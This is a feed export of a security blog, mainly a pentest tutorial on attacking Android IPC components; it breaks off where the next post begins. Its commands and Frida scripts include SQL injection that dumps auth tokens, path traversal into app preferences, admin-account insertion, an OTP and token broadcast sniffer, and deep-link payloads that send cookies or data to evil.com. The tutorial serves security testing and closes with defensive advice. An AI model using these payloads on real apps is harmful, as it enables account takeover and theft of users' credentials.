marginaldeer's blog Security research, pentesting, reverse engineering, and mobile app analysis. Practical guides for breaking into applications. https://www.marginaldeer.com// Tue, 03 Mar 2026 04:09:55 +0000 Tue, 03 Mar 2026 04:09:55 +0000 Jekyll v4.4.1 Attacking Android IPC: Intents, Content Providers, and Broadcast Receivers <p>This is part seven of my Android pentest series. Last week we covered <a href="/android-pentesting/2026/02/23/android-root-emulator-detection-bypass/">bypassing root and emulator detection</a>. Now let’s look at one of Android’s biggest attack surfaces that most testers overlook — inter-process communication.</p> <p>Android apps don’t exist in isolation. They talk to each other through IPC mechanisms: Intents, Content Providers, Broadcast Receivers, and bound Services. When developers expose these components without proper access controls, we can exploit them to steal data, trigger privileged actions, or chain into full compromise.</p> <p>I find IPC bugs on almost every Android assessment. They’re everywhere because developers don’t realize the implications of <code class="language-plaintext highlighter-rouge">android:exported="true"</code>.</p> <h2 id="understanding-the-attack-surface">Understanding the Attack Surface</h2> <p>The AndroidManifest.xml declares all of an app’s components. Any component with <code class="language-plaintext highlighter-rouge">android:exported="true"</code> or an <code class="language-plaintext highlighter-rouge">&lt;intent-filter&gt;</code> is accessible to other apps — including ours.</p> <p>Start by pulling the manifest from a decompiled APK:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apktool d target.apk <span class="nt">-o</span> target/ <span class="nb">cat </span>target/AndroidManifest.xml </code></pre></div></div> <p>Look for:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- Exported activity - anyone can launch this --&gt;</span> <span class="nt">&lt;activity</span> <span class="na">android:name=</span><span class="s">".admin.AdminPanel"</span> <span class="na">android:exported=</span><span class="s">"true"</span> <span class="nt">/&gt;</span> <span class="c">&lt;!-- Intent filter makes it implicitly exported --&gt;</span> <span class="nt">&lt;activity</span> <span class="na">android:name=</span><span class="s">".DeepLinkActivity"</span><span class="nt">&gt;</span> <span class="nt">&lt;intent-filter&gt;</span> <span class="nt">&lt;action</span> <span class="na">android:name=</span><span class="s">"android.intent.action.VIEW"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;data</span> <span class="na">android:scheme=</span><span class="s">"myapp"</span> <span class="na">android:host=</span><span class="s">"action"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;/intent-filter&gt;</span> <span class="nt">&lt;/activity&gt;</span> <span class="c">&lt;!-- Exported content provider - data access --&gt;</span> <span class="nt">&lt;provider</span> <span class="na">android:name=</span><span class="s">".data.UserProvider"</span> <span class="na">android:authorities=</span><span class="s">"com.target.provider"</span> <span class="na">android:exported=</span><span class="s">"true"</span> <span class="nt">/&gt;</span> <span class="c">&lt;!-- Exported broadcast receiver --&gt;</span> <span class="nt">&lt;receiver</span> <span class="na">android:name=</span><span class="s">".AdminReceiver"</span> <span class="na">android:exported=</span><span class="s">"true"</span><span class="nt">&gt;</span> <span class="nt">&lt;intent-filter&gt;</span> <span class="nt">&lt;action</span> <span class="na">android:name=</span><span class="s">"com.target.ADMIN_ACTION"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;/intent-filter&gt;</span> <span class="nt">&lt;/receiver&gt;</span> </code></pre></div></div> <h3 id="quick-enumeration-with-drozer">Quick Enumeration with drozer</h3> <p>If you have <a href="https://github.com/WithSecureLabs/drozer">drozer</a> set up (you should), it makes enumeration fast:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># List attack surface</span> dz&gt; run app.package.attacksurface com.target.app <span class="c"># List exported activities</span> dz&gt; run app.activity.info <span class="nt">-a</span> com.target.app <span class="c"># List exported content providers</span> dz&gt; run app.provider.info <span class="nt">-a</span> com.target.app <span class="c"># List exported broadcast receivers</span> dz&gt; run app.broadcast.info <span class="nt">-a</span> com.target.app <span class="c"># List exported services</span> dz&gt; run app.service.info <span class="nt">-a</span> com.target.app </code></pre></div></div> <h2 id="attacking-exported-activities">Attacking Exported Activities</h2> <p>Exported activities are the most straightforward. If an admin panel, settings page, or debug activity is exported, we can launch it directly — bypassing any authentication flow.</p> <h3 id="launching-activities-with-adb">Launching Activities with ADB</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Launch a specific activity</span> adb shell am start <span class="nt">-n</span> com.target.app/.admin.AdminPanel <span class="c"># Launch with extras (passing data)</span> adb shell am start <span class="nt">-n</span> com.target.app/.TransferActivity <span class="se">\</span> <span class="nt">--es</span> <span class="s2">"account"</span> <span class="s2">"attacker-account"</span> <span class="se">\</span> <span class="nt">--ei</span> <span class="s2">"amount"</span> 10000 <span class="c"># Launch with a data URI</span> adb shell am start <span class="nt">-n</span> com.target.app/.DeepLinkActivity <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"myapp://action/delete?id=1"</span> </code></pre></div></div> <h3 id="real-world-example-auth-bypass">Real-World Example: Auth Bypass</h3> <p>On a recent engagement the app had a <code class="language-plaintext highlighter-rouge">ProfileActivity</code> that displayed user data and was only supposed to be accessible after login. But it was exported:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;activity</span> <span class="na">android:name=</span><span class="s">".ui.ProfileActivity"</span> <span class="na">android:exported=</span><span class="s">"true"</span> <span class="nt">/&gt;</span> </code></pre></div></div> <p>Launching it directly skipped the entire authentication flow:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb shell am start <span class="nt">-n</span> com.target.app/.ui.ProfileActivity </code></pre></div></div> <p>Suddenly I’m looking at the last logged-in user’s profile data without any credentials. To take this further, I checked what extras the activity expected by decompiling it:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// From the decompiled ProfileActivity</span> <span class="nc">String</span> <span class="n">userId</span> <span class="o">=</span> <span class="n">getIntent</span><span class="o">().</span><span class="na">getStringExtra</span><span class="o">(</span><span class="s">"user_id"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">userId</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="n">userId</span> <span class="o">=</span> <span class="n">getCurrentUserId</span><span class="o">();</span> <span class="c1">// Falls back to cached user</span> <span class="o">}</span> <span class="n">loadProfile</span><span class="o">(</span><span class="n">userId</span><span class="o">);</span> </code></pre></div></div> <p>So we can also pass arbitrary user IDs:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb shell am start <span class="nt">-n</span> com.target.app/.ui.ProfileActivity <span class="se">\</span> <span class="nt">--es</span> <span class="s2">"user_id"</span> <span class="s2">"admin"</span> </code></pre></div></div> <p>IDOR through an exported activity. Combined with no server-side authorization check on the profile API, this was straight-up access to any user’s data.</p> <h2 id="attacking-deep-links">Attacking Deep Links</h2> <p>Deep links are a special case of exported activities. Apps register URL schemes that let websites or other apps open specific screens. These are often poorly validated.</p> <h3 id="finding-deep-links">Finding Deep Links</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># From the manifest</span> <span class="nb">grep</span> <span class="nt">-A5</span> <span class="s2">"intent-filter"</span> target/AndroidManifest.xml | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"scheme|host|path"</span> <span class="c"># Or use adb</span> adb shell dumpsys package com.target.app | <span class="nb">grep</span> <span class="nt">-A5</span> <span class="s2">"intent-filter"</span> </code></pre></div></div> <h3 id="exploiting-deep-links">Exploiting Deep Links</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Basic deep link</span> adb shell am start <span class="nt">-a</span> android.intent.action.VIEW <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"myapp://settings/reset-password?token=test"</span> <span class="c"># Web deep link (App Links)</span> adb shell am start <span class="nt">-a</span> android.intent.action.VIEW <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"https://target.com/app/transfer?to=attacker&amp;amount=1000"</span> </code></pre></div></div> <p>Common deep link vulnerabilities:</p> <ul> <li><strong>Open redirect</strong> — <code class="language-plaintext highlighter-rouge">myapp://navigate?url=https://evil.com</code></li> <li><strong>JavaScript injection in WebViews</strong> — <code class="language-plaintext highlighter-rouge">myapp://webview?url=javascript:alert(document.cookie)</code></li> <li><strong>Parameter injection</strong> — Deep link parameters passed directly to API calls without validation</li> </ul> <h3 id="webview-deep-link-attack">WebView Deep Link Attack</h3> <p>If a deep link opens a WebView, test for JavaScript execution:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># XSS via deep link</span> adb shell am start <span class="nt">-a</span> android.intent.action.VIEW <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"myapp://web?url=https://evil.com/steal.html"</span> <span class="c"># JavaScript scheme</span> adb shell am start <span class="nt">-a</span> android.intent.action.VIEW <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"myapp://web?url=javascript:document.location='https://evil.com/?c='%2Bdocument.cookie"</span> </code></pre></div></div> <p>This is devastating when the WebView has <code class="language-plaintext highlighter-rouge">setJavaScriptEnabled(true)</code> and loads the URL from the intent parameter without validation. If the WebView also has a JavaScript interface (<code class="language-plaintext highlighter-rouge">addJavascriptInterface</code>), you might get code execution.</p> <h2 id="attacking-content-providers">Attacking Content Providers</h2> <p>Content Providers expose structured data through a URI-based interface. When exported, they’re basically an unauthenticated database API.</p> <h3 id="querying-providers">Querying Providers</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Query all records</span> adb shell content query <span class="nt">--uri</span> content://com.target.provider/users <span class="c"># Query with projection (specific columns)</span> adb shell content query <span class="nt">--uri</span> content://com.target.provider/users <span class="se">\</span> <span class="nt">--projection</span> <span class="s2">"username:password:email"</span> <span class="c"># Query with selection (WHERE clause)</span> adb shell content query <span class="nt">--uri</span> content://com.target.provider/users <span class="se">\</span> <span class="nt">--where</span> <span class="s2">"role='admin'"</span> </code></pre></div></div> <h3 id="sql-injection-in-content-providers">SQL Injection in Content Providers</h3> <p>Content Providers that use raw SQL queries are vulnerable to injection through the selection parameter:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Test for SQL injection</span> adb shell content query <span class="nt">--uri</span> content://com.target.provider/users <span class="se">\</span> <span class="nt">--where</span> <span class="s2">"1=1) OR 1=1--"</span> <span class="c"># Extract table names</span> adb shell content query <span class="nt">--uri</span> content://com.target.provider/users <span class="se">\</span> <span class="nt">--where</span> <span class="s2">"1=1) UNION SELECT name,sql,null FROM sqlite_master--"</span> <span class="c"># Dump another table</span> adb shell content query <span class="nt">--uri</span> content://com.target.provider/users <span class="se">\</span> <span class="nt">--where</span> <span class="s2">"1=1) UNION SELECT token,refresh_token,null FROM auth_tokens--"</span> </code></pre></div></div> <p>With drozer:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Enumerate URIs</span> dz&gt; run scanner.provider.finduris <span class="nt">-a</span> com.target.app <span class="c"># Test for SQL injection</span> dz&gt; run scanner.provider.injection <span class="nt">-a</span> com.target.app <span class="c"># Query with injection</span> dz&gt; run app.provider.query content://com.target.provider/users <span class="se">\</span> <span class="nt">--selection</span> <span class="s2">"1=1) UNION SELECT sql,null FROM sqlite_master--"</span> </code></pre></div></div> <h3 id="path-traversal-in-file-providers">Path Traversal in File Providers</h3> <p>Some Content Providers serve files. If they don’t validate the path, we can read arbitrary files:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Normal file access</span> adb shell content <span class="nb">read</span> <span class="nt">--uri</span> content://com.target.fileprovider/files/document.pdf <span class="c"># Path traversal</span> adb shell content <span class="nb">read</span> <span class="nt">--uri</span> content://com.target.fileprovider/files/..%2F..%2F..%2Fdata%2Fdata%2Fcom.target.app%2Fshared_prefs%2Fauth.xml </code></pre></div></div> <p>With Frida:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Uri</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.net.Uri</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">cr</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.app.ActivityThread</span><span class="dl">"</span><span class="p">).</span><span class="nf">currentApplication</span><span class="p">()</span> <span class="p">.</span><span class="nf">getContentResolver</span><span class="p">();</span> <span class="kd">var</span> <span class="nx">uri</span> <span class="o">=</span> <span class="nx">Uri</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="dl">"</span><span class="s2">content://com.target.fileprovider/files/../../../../etc/hosts</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">stream</span> <span class="o">=</span> <span class="nx">cr</span><span class="p">.</span><span class="nf">openInputStream</span><span class="p">(</span><span class="nx">uri</span><span class="p">);</span> <span class="c1">// Read the stream</span> <span class="kd">var</span> <span class="nx">BufferedReader</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.BufferedReader</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">InputStreamReader</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.InputStreamReader</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">reader</span> <span class="o">=</span> <span class="nx">BufferedReader</span><span class="p">.</span><span class="nf">$new</span><span class="p">(</span><span class="nx">InputStreamReader</span><span class="p">.</span><span class="nf">$new</span><span class="p">(</span><span class="nx">stream</span><span class="p">));</span> <span class="kd">var</span> <span class="nx">line</span><span class="p">;</span> <span class="k">while </span><span class="p">((</span><span class="nx">line</span> <span class="o">=</span> <span class="nx">reader</span><span class="p">.</span><span class="nf">readLine</span><span class="p">())</span> <span class="o">!==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">line</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> </code></pre></div></div> <h3 id="insert-and-update-operations">Insert and Update Operations</h3> <p>If the provider allows writes, you can modify the app’s data:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Insert a record</span> adb shell content insert <span class="nt">--uri</span> content://com.target.provider/users <span class="se">\</span> <span class="nt">--bind</span> username:s:admin2 <span class="se">\</span> <span class="nt">--bind</span> password:s:hacked <span class="se">\</span> <span class="nt">--bind</span> role:s:admin <span class="c"># Update a record</span> adb shell content update <span class="nt">--uri</span> content://com.target.provider/users <span class="se">\</span> <span class="nt">--bind</span> role:s:admin <span class="se">\</span> <span class="nt">--where</span> <span class="s2">"username='attacker'"</span> </code></pre></div></div> <p>Creating an admin account through an exported Content Provider. I’ve seen this in production.</p> <h2 id="attacking-broadcast-receivers">Attacking Broadcast Receivers</h2> <p>Broadcast Receivers listen for system or app events. Exported receivers can be triggered by any app, which leads to interesting attacks.</p> <h3 id="sending-broadcasts">Sending Broadcasts</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Send a broadcast</span> adb shell am broadcast <span class="nt">-a</span> com.target.ADMIN_ACTION <span class="se">\</span> <span class="nt">-n</span> com.target.app/.AdminReceiver <span class="c"># With extras</span> adb shell am broadcast <span class="nt">-a</span> com.target.RESET_PASSWORD <span class="se">\</span> <span class="nt">--es</span> <span class="s2">"email"</span> <span class="s2">"attacker@evil.com"</span> <span class="se">\</span> <span class="nt">--es</span> <span class="s2">"user_id"</span> <span class="s2">"victim"</span> <span class="c"># Ordered broadcast (with priority)</span> adb shell am broadcast <span class="nt">-a</span> com.target.PAYMENT_COMPLETE <span class="se">\</span> <span class="nt">--ei</span> <span class="s2">"amount"</span> 0 <span class="se">\</span> <span class="nt">--es</span> <span class="s2">"status"</span> <span class="s2">"success"</span> </code></pre></div></div> <h3 id="broadcast-sniffing">Broadcast Sniffing</h3> <p>Register a receiver to capture broadcasts the app sends. Useful for grabbing tokens, OTPs, or sensitive data:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">IntentFilter</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.content.IntentFilter</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">BroadcastReceiver</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.content.BroadcastReceiver</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">Context</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.content.Context</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">filter</span> <span class="o">=</span> <span class="nx">IntentFilter</span><span class="p">.</span><span class="nf">$new</span><span class="p">();</span> <span class="nx">filter</span><span class="p">.</span><span class="nf">addAction</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.OTP_RECEIVED</span><span class="dl">"</span><span class="p">);</span> <span class="nx">filter</span><span class="p">.</span><span class="nf">addAction</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.AUTH_TOKEN</span><span class="dl">"</span><span class="p">);</span> <span class="nx">filter</span><span class="p">.</span><span class="nf">setPriority</span><span class="p">(</span><span class="mi">999</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">receiver</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">registerClass</span><span class="p">({</span> <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">com.attacker.Sniffer</span><span class="dl">"</span><span class="p">,</span> <span class="na">superClass</span><span class="p">:</span> <span class="nx">BroadcastReceiver</span><span class="p">,</span> <span class="na">methods</span><span class="p">:</span> <span class="p">{</span> <span class="na">onReceive</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">context</span><span class="p">,</span> <span class="nx">intent</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[!] Intercepted broadcast:</span><span class="dl">"</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> Action: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">intent</span><span class="p">.</span><span class="nf">getAction</span><span class="p">());</span> <span class="kd">var</span> <span class="nx">extras</span> <span class="o">=</span> <span class="nx">intent</span><span class="p">.</span><span class="nf">getExtras</span><span class="p">();</span> <span class="k">if </span><span class="p">(</span><span class="nx">extras</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">keys</span> <span class="o">=</span> <span class="nx">extras</span><span class="p">.</span><span class="nf">keySet</span><span class="p">().</span><span class="nf">iterator</span><span class="p">();</span> <span class="k">while </span><span class="p">(</span><span class="nx">keys</span><span class="p">.</span><span class="nf">hasNext</span><span class="p">())</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">key</span> <span class="o">=</span> <span class="nx">keys</span><span class="p">.</span><span class="nf">next</span><span class="p">();</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">key</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> = </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">extras</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">key</span><span class="p">));</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">});</span> <span class="kd">var</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.app.ActivityThread</span><span class="dl">"</span><span class="p">).</span><span class="nf">currentApplication</span><span class="p">();</span> <span class="nx">app</span><span class="p">.</span><span class="nf">registerReceiver</span><span class="p">(</span><span class="nx">receiver</span><span class="p">.</span><span class="nf">$new</span><span class="p">(),</span> <span class="nx">filter</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Broadcast sniffer registered</span><span class="dl">"</span><span class="p">);</span> <span class="p">});</span> </code></pre></div></div> <h3 id="real-world-example-otp-hijacking">Real-World Example: OTP Hijacking</h3> <p>App sends a broadcast with the OTP for display in a notification. No permission protection:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;receiver</span> <span class="na">android:name=</span><span class="s">".OTPDisplayReceiver"</span> <span class="na">android:exported=</span><span class="s">"true"</span><span class="nt">&gt;</span> <span class="nt">&lt;intent-filter&gt;</span> <span class="nt">&lt;action</span> <span class="na">android:name=</span><span class="s">"com.target.NEW_OTP"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;/intent-filter&gt;</span> <span class="nt">&lt;/receiver&gt;</span> </code></pre></div></div> <p>Any app on the device can register a higher-priority receiver for <code class="language-plaintext highlighter-rouge">com.target.NEW_OTP</code> and grab the OTP before the legitimate receiver sees it. On Android &lt; 14 this works with ordered broadcasts. Combined with an exported activity that triggers the OTP send, you have a complete authentication bypass.</p> <h2 id="attacking-bound-services">Attacking Bound Services</h2> <p>Services that accept bindings from other apps can receive arbitrary messages:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Start a service</span> adb shell am startservice <span class="nt">-n</span> com.target.app/.SyncService <span class="se">\</span> <span class="nt">--es</span> <span class="s2">"action"</span> <span class="s2">"sync_all"</span> <span class="se">\</span> <span class="nt">--es</span> <span class="s2">"dest"</span> <span class="s2">"https://evil.com/exfil"</span> </code></pre></div></div> <p>For more complex service interactions (Messenger or AIDL), you’ll need to write a small app or use Frida to bind to the service:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Intent</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.content.Intent</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">ComponentName</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.content.ComponentName</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">intent</span> <span class="o">=</span> <span class="nx">Intent</span><span class="p">.</span><span class="nf">$new</span><span class="p">();</span> <span class="nx">intent</span><span class="p">.</span><span class="nf">setComponent</span><span class="p">(</span><span class="nx">ComponentName</span><span class="p">.</span><span class="nf">$new</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.app</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.target.app.ExportedService</span><span class="dl">"</span><span class="p">));</span> <span class="kd">var</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.app.ActivityThread</span><span class="dl">"</span><span class="p">).</span><span class="nf">currentApplication</span><span class="p">();</span> <span class="nx">app</span><span class="p">.</span><span class="nf">startService</span><span class="p">(</span><span class="nx">intent</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Service triggered</span><span class="dl">"</span><span class="p">);</span> <span class="p">});</span> </code></pre></div></div> <h2 id="chaining-ipc-attacks">Chaining IPC Attacks</h2> <p>The real power of IPC attacks comes from chaining them. Here’s a chain I used on an engagement:</p> <ol> <li><strong>Exported Activity</strong> with deep link accepted a URL parameter</li> <li><strong>WebView</strong> loaded the URL with JavaScript enabled and <code class="language-plaintext highlighter-rouge">addJavascriptInterface</code></li> <li><strong>JavaScript bridge</strong> had a method that wrote to a <strong>Content Provider</strong></li> <li><strong>Content Provider</strong> had no write validation</li> <li><strong>Modified the auth token</strong> stored in the provider’s database</li> </ol> <p>The chain: Malicious link → Deep link → WebView → JS bridge → Content Provider write → Account takeover.</p> <p>Each component in isolation might look low-risk. Chained together, it’s a critical finding.</p> <h2 id="automation-script">Automation Script</h2> <p>I use this bash script to quickly enumerate the IPC attack surface:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span> <span class="nv">PKG</span><span class="o">=</span><span class="nv">$1</span> <span class="k">if</span> <span class="o">[</span> <span class="nt">-z</span> <span class="s2">"</span><span class="nv">$PKG</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then </span><span class="nb">echo</span> <span class="s2">"Usage: </span><span class="nv">$0</span><span class="s2"> &lt;package_name&gt;"</span> <span class="nb">exit </span>1 <span class="k">fi </span><span class="nb">echo</span> <span class="s2">"=== IPC Attack Surface for </span><span class="nv">$PKG</span><span class="s2"> ==="</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">"--- Exported Activities ---"</span> adb shell dumpsys package <span class="nv">$PKG</span> | <span class="nb">grep</span> <span class="nt">-A1</span> <span class="s2">"Activity "</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"exported=true"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">"--- Deep Links ---"</span> adb shell dumpsys package <span class="nv">$PKG</span> | <span class="nb">grep</span> <span class="nt">-B1</span> <span class="nt">-A10</span> <span class="s2">"intent-filter"</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"scheme|host|path|Action"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">"--- Content Providers ---"</span> adb shell dumpsys package <span class="nv">$PKG</span> | <span class="nb">grep</span> <span class="nt">-A3</span> <span class="s2">"Provider "</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"authority|exported"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">"--- Broadcast Receivers ---"</span> adb shell dumpsys package <span class="nv">$PKG</span> | <span class="nb">grep</span> <span class="nt">-A2</span> <span class="s2">"Receiver "</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"exported=true"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">"--- Services ---"</span> adb shell dumpsys package <span class="nv">$PKG</span> | <span class="nb">grep</span> <span class="nt">-A2</span> <span class="s2">"Service "</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"exported=true"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">"--- Permissions ---"</span> adb shell dumpsys package <span class="nv">$PKG</span> | <span class="nb">grep</span> <span class="s2">"permission:"</span> | <span class="nb">head</span> <span class="nt">-20</span> </code></pre></div></div> <h2 id="prevention-what-to-tell-developers">Prevention (What to Tell Developers)</h2> <p>When you’re writing up these findings:</p> <ul> <li><strong>Don’t export components unnecessarily.</strong> Set <code class="language-plaintext highlighter-rouge">android:exported="false"</code> unless the component truly needs external access.</li> <li><strong>Use custom permissions</strong> for components that must be exported: <code class="language-plaintext highlighter-rouge">android:permission="com.target.ADMIN_PERMISSION"</code></li> <li><strong>Validate all Intent extras.</strong> Never trust data from incoming Intents.</li> <li><strong>Use signature-level permissions</strong> for IPC between your own apps.</li> <li><strong>Content Providers should use parameterized queries.</strong> No raw SQL with user input.</li> <li><strong>File Providers must validate paths.</strong> Canonicalize and check that the resolved path is within allowed directories.</li> <li><strong>Use <code class="language-plaintext highlighter-rouge">LocalBroadcastManager</code></strong> (or <code class="language-plaintext highlighter-rouge">LiveData</code>) for internal broadcasts. Don’t send sensitive data via global broadcasts.</li> </ul> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="/android-pentesting/2026/02/23/android-root-emulator-detection-bypass/">Root/Emulator Detection Bypass</a> — Get past the front door</li> <li><a href="/android-pentesting/2025/11/15/frida-method-hooking-android/">Frida Method Hooking</a> — Runtime analysis fundamentals</li> <li><a href="/android-pentesting/2025/12/13/apk-reverse-engineering-workflow/">APK Reverse Engineering</a> — Finding IPC components in decompiled code</li> <li><a href="/cheatsheets/apk-analysis/">APK Analysis Cheat Sheet</a> — Quick reference for static analysis</li> </ul> Mon, 02 Mar 2026 20:00:00 +0000 https://www.marginaldeer.com//blog/android-ipc-attacks/ https://www.marginaldeer.com//blog/android-ipc-attacks/ android ipc pentest mobile privilege-escalation blog Bypassing Root Detection and Emulator Checks on Android <p>This is part six of my Android pentest series. We’ve covered <a href="/blog/android-pentest-lab/">the lab</a>, <a href="/blog/android-ssl-pinning-bypass/">SSL pinning</a>, <a href="/android-pentesting/2025/11/15/frida-method-hooking-android/">method hooking</a>, <a href="/android-pentesting/2025/11/25/frida-native-hooking/">native hooking</a>, and <a 